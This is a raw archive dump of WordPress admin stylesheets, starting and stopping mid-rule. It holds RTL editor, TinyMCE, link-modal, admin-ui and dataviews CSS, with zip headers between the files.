box-shadow: 0 1px 0 #2271b1, 0 0 2px 1px #72aee6; } .mce-window .mce-btn.mce-primary:active { background: #2271b1; border-color: #135e96; box-shadow: inset 0 2px 0 #135e96; vertical-align: top; } .mce-window .mce-btn.mce-primary.mce-disabled { color: #9ec2e6 !important; background: #4f94d4 !important; border-color: #3582c4 !important; box-shadow: none !important; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.1) !important; cursor: default; } .mce-menubtn.mce-fixed-width span { overflow-x: hidden; text-overflow: ellipsis; width: 82px; } /* Charmap modal */ .mce-charmap { margin: 3px; } .mce-charmap td { padding: 0; border-color: #dcdcde; cursor: pointer; } .mce-charmap td:hover { background: #f6f7f7; } .mce-charmap td div { width: 18px; height: 22px; line-height: 1.57142857; } /* TinyMCE tooltips */ .mce-tooltip { margin-top: 2px; } .mce-tooltip-inner { border-radius: 3px; box-shadow: 0 3px 5px rgba(0, 0, 0, 0.2); color: #fff; font-size: 12px; } /* TinyMCE icons */ .mce-ico { font-family: tinymce, Arial; } .mce-btn-small .mce-ico { font-family: tinymce-small, Arial; } .mce-toolbar .mce-ico { color: #50575e; line-height: 1; width: 20px; height: 20px; text-align: center; text-shadow: none; margin: 0; padding: 0; } .qt-dfw { color: #50575e; line-height: 1; width: 28px; height: 26px; text-align: center; text-shadow: none; } .mce-toolbar .mce-btn .mce-open { line-height: 20px; } .mce-toolbar .mce-btn:hover .mce-open, .mce-toolbar .mce-btn:focus .mce-open, .mce-toolbar .mce-btn.mce-active .mce-open { border-right-color: #1d2327; } div.mce-notification { right: 10% !important; left: 10%; } .mce-notification button.mce-close { left: 6px; top: 3px; font-weight: 400; color: #50575e; } .mce-notification button.mce-close:hover, .mce-notification button.mce-close:focus { color: #000; } i.mce-i-bold, i.mce-i-italic, i.mce-i-bullist, i.mce-i-numlist, i.mce-i-blockquote, i.mce-i-alignleft, i.mce-i-aligncenter, i.mce-i-alignright, i.mce-i-link, i.mce-i-unlink, i.mce-i-wp_more, i.mce-i-strikethrough, i.mce-i-spellchecker, i.mce-i-fullscreen, i.mce-i-wp_fullscreen, i.mce-i-dfw, i.mce-i-wp_adv, i.mce-i-underline, i.mce-i-alignjustify, i.mce-i-forecolor, i.mce-i-backcolor, i.mce-i-pastetext, i.mce-i-pasteword, i.mce-i-removeformat, i.mce-i-charmap, i.mce-i-outdent, i.mce-i-indent, i.mce-i-undo, i.mce-i-redo, i.mce-i-help, i.mce-i-wp_help, i.mce-i-wp-media-library, i.mce-i-ltr, i.mce-i-wp_page, i.mce-i-hr, i.mce-i-wp_code, i.mce-i-dashicon, i.mce-i-remove { font: normal 20px/1 dashicons; padding: 0; vertical-align: top; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; margin-right: -2px; padding-left: 2px; } .qt-dfw { font: normal 20px/1 dashicons; vertical-align: top; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } i.mce-i-bold:before { content: "\f200"; content: "\f200" / ''; } i.mce-i-italic:before { content: "\f201"; content: "\f201" / ''; } i.mce-i-bullist:before { content: "\f203"; content: "\f203" / ''; } i.mce-i-numlist:before { content: "\f204"; content: "\f204" / ''; } i.mce-i-blockquote:before { content: "\f205"; content: "\f205" / ''; } i.mce-i-alignleft:before { content: "\f206"; content: "\f206" / ''; } i.mce-i-aligncenter:before { content: "\f207"; content: "\f207" / ''; } i.mce-i-alignright:before { content: "\f208"; content: "\f208" / ''; } i.mce-i-link:before { content: "\f103"; content: "\f103" / ''; } i.mce-i-unlink:before { content: "\f225"; content: "\f225" / ''; } i.mce-i-wp_more:before { content: "\f209"; content: "\f209" / ''; } i.mce-i-strikethrough:before { content: "\f224"; content: "\f224" / ''; } i.mce-i-spellchecker:before { content: "\f210"; content: "\f210" / ''; } i.mce-i-fullscreen:before, i.mce-i-wp_fullscreen:before, i.mce-i-dfw:before, .qt-dfw:before { content: "\f211"; content: "\f211" / ''; } i.mce-i-wp_adv:before { content: "\f212"; content: "\f212" / ''; } i.mce-i-underline:before { content: "\f213"; content: "\f213" / ''; } i.mce-i-alignjustify:before { content: "\f214"; content: "\f214" / ''; } i.mce-i-forecolor:before, i.mce-i-backcolor:before { content: "\f215"; content: "\f215" / ''; } i.mce-i-pastetext:before { content: "\f217"; content: "\f217" / ''; } i.mce-i-removeformat:before { content: "\f218"; content: "\f218" / ''; } i.mce-i-charmap:before { content: "\f220"; content: "\f220" / ''; } i.mce-i-outdent:before { content: "\f221"; content: "\f221" / ''; } i.mce-i-indent:before { content: "\f222"; content: "\f222" / ''; } i.mce-i-undo:before { content: "\f171"; content: "\f171" / ''; } i.mce-i-redo:before { content: "\f172"; content: "\f172" / ''; } i.mce-i-help:before, i.mce-i-wp_help:before { content: "\f223"; content: "\f223" / ''; } i.mce-i-wp-media-library:before { content: "\f104"; content: "\f104" / ''; } i.mce-i-ltr:before { content: "\f320"; content: "\f320" / ''; } i.mce-i-wp_page:before { content: "\f105"; content: "\f105" / ''; } i.mce-i-hr:before { content: "\f460"; content: "\f460" / ''; } i.mce-i-remove:before { content: "\f158"; content: "\f158" / ''; } i.mce-i-wp_code:before { content: "\f475"; content: "\f475" / ''; } /* RTL button icons */ .rtl i.mce-i-outdent:before { content: "\f222"; content: "\f222" / ''; } .rtl i.mce-i-indent:before { content: "\f221"; content: "\f221" / ''; } /* Editors */ .wp-editor-wrap { position: relative; } .wp-editor-tools { position: relative; z-index: 1; } .wp-editor-tools:after { clear: both; content: ""; display: table; } .wp-editor-container { clear: both; border: 1px solid #dcdcde; } .wp-editor-area { font-family: Consolas, Monaco, monospace; font-size: 13px; padding: 10px; margin: 1px 0 0; line-height: 150%; border: 0; outline: none; display: block; resize: vertical; box-sizing: border-box; } .rtl .wp-editor-area { font-family: Tahoma, Monaco, monospace; } .locale-he-il .wp-editor-area { font-family: Arial, Monaco, monospace; } .wp-editor-container textarea.wp-editor-area { width: 100%; margin: 0; box-shadow: none; } .wp-editor-tabs { float: left; } .wp-switch-editor { float: right; box-sizing: content-box; position: relative; top: 1px; background: #f0f0f1; color: #646970; cursor: pointer; font-size: 13px; line-height: 1.46153846; height: 20px; margin: 5px 5px 0 0; padding: 3px 8px 4px; border: 1px solid #dcdcde; } .wp-switch-editor:focus { box-shadow: 0 0 0 2px #2271b1; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; color: #1d2327; } .wp-switch-editor:active { background-color: #f6f7f7; box-shadow: none; } .js .tmce-active .wp-editor-area { color: #fff; } .tmce-active .quicktags-toolbar { display: none; } .tmce-active .switch-tmce, .html-active .switch-html { background: #f6f7f7; color: #50575e; border-bottom-color: #f6f7f7; } .wp-media-buttons { float: right; } .wp-media-buttons .button { margin-left: 5px; margin-bottom: 4px; padding-right: 7px; padding-left: 7px; } .wp-media-buttons .button:active { position: relative; top: 1px; margin-top: -1px; margin-bottom: 1px; } .wp-media-buttons .insert-media { padding-right: 5px; } .wp-media-buttons a { text-decoration: none; color: #3c434a; font-size: 12px; } .wp-media-buttons img { padding: 0 4px; vertical-align: middle; } .wp-media-buttons span.wp-media-buttons-icon { display: inline-block; width: 20px; height: 20px; line-height: 1; vertical-align: middle; margin: 0 2px; } .wp-media-buttons .add_media span.wp-media-buttons-icon { background: none; } .wp-media-buttons .add_media span.wp-media-buttons-icon:before { font: normal 18px/1 dashicons; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .wp-media-buttons .add_media span.wp-media-buttons-icon:before { content: "\f104"; content: "\f104" / ''; } .mce-content-body dl.wp-caption { max-width: 100%; } /* Quicktags */ .quicktags-toolbar { padding: 3px; position: relative; border-bottom: 1px solid #dcdcde; background: #f6f7f7; min-height: 30px; } .has-dfw .quicktags-toolbar { padding-left: 35px; } .wp-core-ui .quicktags-toolbar input.button.button-small { margin: 2px; } .quicktags-toolbar input[value="link"] { text-decoration: underline; } .quicktags-toolbar input[value="del"] { text-decoration: line-through; } .quicktags-toolbar input[value="i"] { font-style: italic; } .quicktags-toolbar input[value="b"] { font-weight: 600; } .mce-toolbar .mce-btn-group .mce-btn.mce-wp-dfw, .qt-dfw { position: absolute; top: 0; left: 0; } .mce-toolbar .mce-btn-group .mce-btn.mce-wp-dfw { margin: 7px 0 0 7px; } .qt-dfw { margin: 5px 0 0 5px; } .qt-fullscreen { position: static; margin: 2px; } @media screen and (max-width: 782px) { .mce-toolbar .mce-btn button, .qt-dfw { padding: 6px 7px; } /* Compensate for the extra box shadow at the bottom of .mce-btn.mce-primary */ .mce-toolbar .mce-btn-group .mce-btn.mce-primary button { padding: 6px 7px 5px; } .mce-toolbar .mce-btn-group .mce-btn { margin: 1px; } .qt-dfw { width: 36px; height: 34px; } .mce-toolbar .mce-btn-group .mce-btn.mce-wp-dfw { margin: 4px 0 0 4px; } .mce-toolbar .mce-colorbutton .mce-preview { right: 8px; bottom: 6px; } .mce-window .mce-btn { padding: 2px 0; } .has-dfw div.mce-toolbar-grp .mce-toolbar.mce-first, .has-dfw .quicktags-toolbar { padding-left: 40px; } } @media screen and (min-width: 782px) { .wp-core-ui .quicktags-toolbar input.button.button-small { /* .button-small is normally 11px, but a bit too small for these buttons. */ font-size: 12px; min-height: 26px; line-height: 2; } } #wp_editbtns, #wp_gallerybtns { padding: 2px; position: absolute; display: none; z-index: 100020; } #wp_editimgbtn, #wp_delimgbtn, #wp_editgallery, #wp_delgallery { background-color: #f0f0f1; margin: 2px; padding: 2px; border: 1px solid #8c8f94; border-radius: 3px; } #wp_editimgbtn:hover, #wp_delimgbtn:hover, #wp_editgallery:hover, #wp_delgallery:hover { border-color: #50575e; background-color: #c3c4c7; } /*------------------------------------------------------------------------------ wp-link ------------------------------------------------------------------------------*/ #wp-link-wrap { display: none; background-color: #fff; box-shadow: 0 3px 6px rgba(0, 0, 0, 0.3); width: 500px; overflow: hidden; margin-right: -250px; margin-top: -125px; position: fixed; top: 50%; right: 50%; z-index: 100105; transition: height 0.2s, margin-top 0.2s; } #wp-link-backdrop { display: none; position: fixed; top: 0; right: 0; left: 0; bottom: 0; min-height: 360px; background: #000; opacity: 0.7; filter: alpha(opacity=70); z-index: 100100; } #wp-link { position: relative; height: 100%; } #wp-link-wrap { height: 600px; margin-top: -300px; } #wp-link-wrap .wp-link-text-field { display: none; } #wp-link-wrap.has-text-field .wp-link-text-field { display: block; } #link-modal-title { background: #fff; border-bottom: 1px solid #dcdcde; font-size: 18px; font-weight: 600; line-height: 2; margin: 0; padding: 0 16px 0 36px; } #wp-link-close { color: #646970; padding: 0; position: absolute; top: 0; left: 0; width: 36px; height: 36px; text-align: center; background: none; border: none; cursor: pointer; } #wp-link-close:before { font: normal 20px/36px dashicons; vertical-align: top; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; width: 36px; height: 36px; content: "\f158"; content: "\f158" / ''; } #wp-link-close:hover, #wp-link-close:focus { color: #135e96; } #wp-link-close:focus { box-shadow: 0 0 0 2px #2271b1; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; outline-offset: -2px; } #wp-link-wrap #link-selector { -webkit-overflow-scrolling: touch; padding: 0 16px; position: absolute; top: calc(2.15384615em + 16px); right: 0; left: 0; bottom: calc(2.15384615em + 19px); display: flex; flex-direction: column; overflow: auto; } #wp-link ol, #wp-link ul { list-style: none; margin: 0; padding: 0; } #wp-link input[type="text"] { box-sizing: border-box; } #wp-link #link-options { padding: 8px 0 12px; } #wp-link p.howto { margin: 3px 0; } #wp-link p.howto a { text-decoration: none; color: inherit; } #wp-link label input[type="text"] { margin-top: 5px; width: 70%; } #wp-link #link-options label span, #wp-link #search-panel label span.search-label { display: inline-block; width: 120px; text-align: left; padding-left: 5px; max-width: 24%; vertical-align: middle; word-wrap: break-word; } #wp-link .link-search-field { width: 250px; max-width: 70%; } #wp-link .link-search-wrapper { margin: 5px 0 9px; display: block; } #wp-link .query-results { position: absolute; width: calc(100% - 32px); } #wp-link .link-search-wrapper .spinner { float: none; margin: -3px 4px 0 0; } #wp-link .link-target { padding: 3px 0 0; } #wp-link .link-target label { max-width: 70%; } #wp-link .query-results { border: 1px #dcdcde solid; margin: 0 0 12px; background: #fff; overflow: auto; max-height: 290px; } #wp-link li { clear: both; margin-bottom: 0; border-bottom: 1px solid #f0f0f1; color: #2c3338; padding: 4px 10px 4px 6px; cursor: pointer; position: relative; } #wp-link .query-notice { padding: 0; border-bottom: 1px solid #dcdcde; background-color: #fff; color: #000; } #wp-link .query-notice .query-notice-default, #wp-link .query-notice .query-notice-hint { display: block; padding: 6px; border-right: 4px solid #72aee6; } #wp-link .unselectable.no-matches-found { padding: 0; border-bottom: 1px solid #dcdcde; background-color: #f6f7f7; } #wp-link .no-matches-found .item-title { display: block; padding: 6px; border-right: 4px solid #d63638; } #wp-link .query-results em { font-style: normal; } #wp-link li:hover { background: #f0f6fc; color: #101517; } #wp-link li.unselectable { border-bottom: 1px solid #dcdcde; } #wp-link li.unselectable:hover { background: #fff; cursor: auto; color: #2c3338; } #wp-link li.selected { background: #dcdcde; color: #2c3338; } #wp-link li.selected .item-title { font-weight: 600; } #wp-link li:last-child { border: none; } #wp-link .item-title { display: inline-block; width: 80%; width: calc(100% - 68px); word-wrap: break-word; } #wp-link .item-info { text-transform: uppercase; color: #646970; font-size: 11px; position: absolute; left: 5px; top: 5px; } #wp-link .river-waiting { display: none; padding: 10px 0; } #wp-link .submitbox { padding: 8px 16px; background: #fff; border-top: 1px solid #dcdcde; position: absolute; bottom: 0; right: 0; left: 0; } #wp-link-cancel { line-height: 1.92307692; float: right; } #wp-link-update { line-height: 1.76923076; float: left; } #wp-link-submit { float: left; } @media screen and (max-width: 782px) { #link-selector { padding: 0 16px 60px; } #wp-link-wrap #link-selector { bottom: calc(2.71428571em + 23px); } #wp-link-cancel { line-height: 2.46153846; } #wp-link .link-target { padding-top: 10px; } #wp-link .submitbox .button { margin-bottom: 0; } } @media screen and (max-width: 520px) { #wp-link-wrap { width: auto; margin-right: 0; right: 10px; left: 10px; max-width: 500px; } } @media screen and (max-height: 620px) { #wp-link-wrap { transition: none; height: auto; margin-top: 0; top: 10px; bottom: 10px; } #link-selector { overflow: auto; } } @media screen and (max-height: 290px) { #wp-link-wrap { height: auto; margin-top: 0; top: 10px; bottom: 10px; } #link-selector { overflow: auto; height: calc(100% - 92px); padding-bottom: 2px; } } div.wp-link-preview { float: right; margin: 5px; max-width: 694px; overflow: hidden; text-overflow: ellipsis; } div.wp-link-preview a { color: #2271b1; text-decoration: underline; transition-property: border, background, color; transition-duration: .05s; transition-timing-function: ease-in-out; cursor: pointer; } div.wp-link-preview a.wplink-url-error { color: #d63638; } .mce-inline-toolbar-grp div.mce-flow-layout-item > div { display: flex; align-items: flex-end; } div.wp-link-input { float: right; margin: 2px; max-width: 694px; } div.wp-link-input label { margin-bottom: 4px; display: block; } div.wp-link-input input { width: 300px; padding: 3px; box-sizing: border-box; line-height: 1.28571429; /* 18px */ /* Override value inherited from default input fields. */ min-height: 26px; } .mce-toolbar div.wp-link-preview ~ .mce-btn, .mce-toolbar div.wp-link-input ~ .mce-btn { margin: 2px 1px; } .mce-inline-toolbar-grp .mce-btn-group .mce-btn:last-child { margin-left: 2px; } .ui-autocomplete.wplink-autocomplete { z-index: 100110; max-height: 200px; overflow-y: auto; padding: 0; margin: 0; list-style: none; position: absolute; border: 1px solid #4f94d4; box-shadow: 0 1px 2px rgba(79, 148, 212, 0.8); background-color: #fff; } .ui-autocomplete.wplink-autocomplete li { margin-bottom: 0; padding: 4px 10px; clear: both; white-space: normal; text-align: right; } .ui-autocomplete.wplink-autocomplete li .wp-editor-float-right { float: left; } .ui-autocomplete.wplink-autocomplete li.ui-state-focus { background-color: #dcdcde; cursor: pointer; } @media screen and (max-width: 782px) { div.wp-link-preview, div.wp-link-input { max-width: 70%; max-width: calc(100% - 86px); } div.wp-link-preview { margin: 8px 5px 8px 0; } div.wp-link-input { width: 300px; } div.wp-link-input input { width: 100%; font-size: 16px; padding: 5px; } } /* =Overlay Body -------------------------------------------------------------- */ .mce-fullscreen { z-index: 100010; } /* =Localization -------------------------------------------------------------- */ .rtl .wp-switch-editor, .rtl .quicktags-toolbar input { font-family: Tahoma, sans-serif; } /* rtl:ignore */ .mce-rtl .mce-flow-layout .mce-flow-layout-item > div { direction: rtl; } /* rtl:ignore */ .mce-rtl .mce-listbox i.mce-caret { left: 6px; } html:lang(he-il) .rtl .wp-switch-editor, html:lang(he-il) .rtl .quicktags-toolbar input { font-family: Arial, sans-serif; } /* HiDPI */ @media print, (min-resolution: 120dpi) { .wp-media-buttons .add_media span.wp-media-buttons-icon { background: none; } } PK!P]wp-empty-template-alert.min.cssnuȯ/*! This file is auto-generated */ #wp-empty-template-alert{display:flex;padding:var(--wp--style--root--padding-right,2rem);min-height:60vh;flex-direction:column;align-items:center;justify-content:center;gap:var(--wp--style--block-gap,2rem)}#wp-empty-template-alert>*{max-width:400px}#wp-empty-template-alert h2,#wp-empty-template-alert p{margin:0;text-align:center}#wp-empty-template-alert a{margin-top:1rem}PK!w2NNdist/admin-ui/style-rtl.cssnuȯ.admin-ui-page{ background-color:#fff; color:#2f2f2f; container:admin-ui-page/inline-size; display:flex; flex-flow:column; height:100%; position:relative; z-index:1; } @media not (prefers-reduced-motion){ .admin-ui-page{ transition:width .2s ease-out; } } .admin-ui-page__header{ background:#fff; border-bottom:1px solid #f0f0f0; padding:16px 48px; position:sticky; top:0; } @container (max-width: 430px){ .admin-ui-page__header{ padding:16px 24px; } } .admin-ui-page__header-subtitle{ color:#757575; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; line-height:20px; margin:0; padding-block-end:8px; } .admin-ui-page__content{ display:flex; flex-direction:column; flex-grow:1; overflow:auto; } .admin-ui-page__content.has-padding{ padding:16px 20px; } @container (max-width: 430px){ .admin-ui-page__content.has-padding{ padding:16px 24px; } } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{ padding:0 8px; width:auto; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{ display:none; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{ content:attr(aria-label); font-size:12px; }PK!3xYdist/admin-ui/style-rtl.min.cssnuȯ.admin-ui-page{background-color:#fff;color:#2f2f2f;container:admin-ui-page/inline-size;display:flex;flex-flow:column;height:100%;position:relative;z-index:1}@media not (prefers-reduced-motion){.admin-ui-page{transition:width .2s ease-out}}.admin-ui-page__header{background:#fff;border-bottom:1px solid #f0f0f0;padding:16px 48px;position:sticky;top:0}@container (max-width: 430px){.admin-ui-page__header{padding:16px 24px}}.admin-ui-page__header-subtitle{color:#757575;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;line-height:20px;margin:0;padding-block-end:8px}.admin-ui-page__content{display:flex;flex-direction:column;flex-grow:1;overflow:auto}.admin-ui-page__content.has-padding{padding:16px 20px}@container (max-width: 430px){.admin-ui-page__content.has-padding{padding:16px 24px}}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{padding:0 8px;width:auto}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{display:none}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{content:attr(aria-label);font-size:12px}PK!3xYdist/admin-ui/style.min.cssnuȯ.admin-ui-page{background-color:#fff;color:#2f2f2f;container:admin-ui-page/inline-size;display:flex;flex-flow:column;height:100%;position:relative;z-index:1}@media not (prefers-reduced-motion){.admin-ui-page{transition:width .2s ease-out}}.admin-ui-page__header{background:#fff;border-bottom:1px solid #f0f0f0;padding:16px 48px;position:sticky;top:0}@container (max-width: 430px){.admin-ui-page__header{padding:16px 24px}}.admin-ui-page__header-subtitle{color:#757575;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;line-height:20px;margin:0;padding-block-end:8px}.admin-ui-page__content{display:flex;flex-direction:column;flex-grow:1;overflow:auto}.admin-ui-page__content.has-padding{padding:16px 20px}@container (max-width: 430px){.admin-ui-page__content.has-padding{padding:16px 24px}}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{padding:0 8px;width:auto}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{display:none}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{content:attr(aria-label);font-size:12px}PK!w2NNdist/admin-ui/style.cssnuȯ.admin-ui-page{ background-color:#fff; color:#2f2f2f; container:admin-ui-page/inline-size; display:flex; flex-flow:column; height:100%; position:relative; z-index:1; } @media not (prefers-reduced-motion){ .admin-ui-page{ transition:width .2s ease-out; } } .admin-ui-page__header{ background:#fff; border-bottom:1px solid #f0f0f0; padding:16px 48px; position:sticky; top:0; } @container (max-width: 430px){ .admin-ui-page__header{ padding:16px 24px; } } .admin-ui-page__header-subtitle{ color:#757575; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; line-height:20px; margin:0; padding-block-end:8px; } .admin-ui-page__content{ display:flex; flex-direction:column; flex-grow:1; overflow:auto; } .admin-ui-page__content.has-padding{ padding:16px 20px; } @container (max-width: 430px){ .admin-ui-page__content.has-padding{ padding:16px 24px; } } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{ padding:0 8px; width:auto; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{ display:none; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{ content:attr(aria-label); font-size:12px; }PK!hdist/edit-site/style.min.cssnuȯ@charset "UTF-8";.admin-ui-page{background-color:#fff;color:#2f2f2f;container:admin-ui-page/inline-size;display:flex;flex-flow:column;height:100%;position:relative;z-index:1}@media not (prefers-reduced-motion){.admin-ui-page{transition:width .2s ease-out}}.admin-ui-page__header{background:#fff;border-bottom:1px solid #f0f0f0;padding:16px 48px;position:sticky;top:0}@container (max-width: 430px){.admin-ui-page__header{padding:16px 24px}}.admin-ui-page__header-subtitle{color:#757575;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;line-height:20px;margin:0;padding-block-end:8px}.admin-ui-page__content{display:flex;flex-direction:column;flex-grow:1;overflow:auto}.admin-ui-page__content.has-padding{padding:16px 20px}@container (max-width: 430px){.admin-ui-page__content.has-padding{padding:16px 24px}}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{padding:0 8px;width:auto}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{display:none}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{content:attr(aria-label);font-size:12px}.dataviews-picker-wrapper,.dataviews-wrapper{box-sizing:border-box;container:dataviews-wrapper/inline-size;display:flex;flex-direction:column;font-size:13px;height:100%;line-height:1.4;overflow:auto;scroll-padding-bottom:64px}.dataviews-filters__container,.dataviews__view-actions{box-sizing:border-box;flex-shrink:0;left:0;padding:16px 48px;position:sticky}@media not (prefers-reduced-motion){.dataviews-filters__container,.dataviews__view-actions{transition:padding .1s ease-out}}.dataviews-loading,.dataviews-no-results{align-items:center;display:flex;flex-grow:1;justify-content:center;padding:0 48px}@media not (prefers-reduced-motion){.dataviews-loading,.dataviews-no-results{transition:padding .1s ease-out}}.dataviews-loading-more{text-align:center}@container (max-width: 430px){.dataviews-filters__container,.dataviews__view-actions{padding:12px 24px}.dataviews-loading,.dataviews-no-results{padding-left:24px;padding-right:24px}}.dataviews-title-field{font-size:13px;font-weight:500;width:100%}.dataviews-title-field,.dataviews-title-field a{color:#2f2f2f;text-overflow:ellipsis;white-space:nowrap}.dataviews-title-field a{display:block;flex-grow:0;overflow:hidden;text-decoration:none}.dataviews-title-field a:hover{color:var(--wp-admin-theme-color)}.dataviews-title-field a:focus{border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color,#007cba);color:var(--wp-admin-theme-color--rgb)}.dataviews-title-field button.components-button.is-link{color:#1e1e1e;display:block;font-weight:inherit;overflow:hidden;text-decoration:none;text-overflow:ellipsis;white-space:nowrap;width:100%}.dataviews-title-field button.components-button.is-link:hover{color:var(--wp-admin-theme-color)}.dataviews-title-field--clickable{color:#2f2f2f;cursor:pointer}.dataviews-title-field--clickable:hover{color:var(--wp-admin-theme-color)}.dataviews-title-field--clickable:focus{border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color,#007cba);color:var(--wp-admin-theme-color--rgb)}.components-card__body:has(>.dataviews-picker-wrapper),.components-card__body:has(>.dataviews-wrapper){overflow:hidden;padding:8px 0 0}.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-filters__container,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-footer,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-loading,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-no-results,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-grid,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews__view-actions,.components-card__body:has(>.dataviews-wrapper) .dataviews-filters__container,.components-card__body:has(>.dataviews-wrapper) .dataviews-footer,.components-card__body:has(>.dataviews-wrapper) .dataviews-loading,.components-card__body:has(>.dataviews-wrapper) .dataviews-no-results,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-grid,.components-card__body:has(>.dataviews-wrapper) .dataviews__view-actions{padding-inline:24px}.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr td:first-child,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr th:first-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr td:first-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr th:first-child{padding-inline-start:24px}.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr td:last-child,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr th:last-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr td:last-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr th:last-child{padding-inline-end:24px}.dataviews-bulk-actions-footer__item-count{color:#1e1e1e;font-size:11px;font-weight:500;text-transform:uppercase}.dataviews-bulk-actions-footer__container{margin-right:auto;min-height:32px}.dataviews-filters__button{position:relative}.dataviews-filters__container{padding-top:0}.dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true],.dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true]:hover{opacity:0}.dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true]:focus{opacity:1}.dataviews-filters__summary-popover{font-size:13px;line-height:1.4}.dataviews-filters__summary-popover .components-popover__content{border-radius:4px;max-width:250px;min-width:230px;width:100%}.dataviews-filters__summary-popover.components-dropdown__content .components-popover__content{padding:0}.dataviews-filters__summary-operators-container{padding:8px 16px}.dataviews-filters__summary-operators-container:has(+.dataviews-filters__search-widget-listbox),.dataviews-filters__summary-operators-container:has(+.dataviews-filters__search-widget-no-elements),.dataviews-filters__summary-operators-container:has(+.dataviews-filters__user-input-widget){border-bottom:1px solid #e0e0e0}.dataviews-filters__summary-operators-container:empty{display:none}.dataviews-filters__summary-operators-container .dataviews-filters__summary-operators-filter-name{color:#757575;flex-shrink:0;max-width:calc(100% - 55px);overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.dataviews-filters__summary-operators-container .dataviews-filters__summary-operators-filter-select{overflow:hidden;white-space:nowrap;width:100%}.dataviews-filters__summary-chip-container{position:relative;white-space:pre-wrap}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip{align-items:center;background:#f0f0f0;border:1px solid #0000;border-radius:16px;box-sizing:border-box;color:#2f2f2f;cursor:pointer;display:flex;min-height:32px;padding:4px 12px;position:relative}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.is-not-clickable{cursor:default}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-reset{padding-inline-end:28px}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:focus-visible,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:hover:not(.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.is-not-clickable),.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip[aria-expanded=true]{background:#e0e0e0;color:#1e1e1e}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values{background:rgba(var(--wp-admin-theme-color--rgb),.04);color:var(--wp-admin-theme-color)}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values:hover,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values[aria-expanded=true]{background:rgba(var(--wp-admin-theme-color--rgb),.12)}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:focus-visible{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:none}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip .dataviews-filters-__summary-filter-text-name{font-weight:500}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove{align-items:center;background:#0000;border:0;border-radius:50%;cursor:pointer;display:flex;height:24px;justify-content:center;padding:0;position:absolute;right:4px;top:50%;transform:translateY(-50%);width:24px}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove svg{fill:#757575}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:hover{background:#e0e0e0}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus 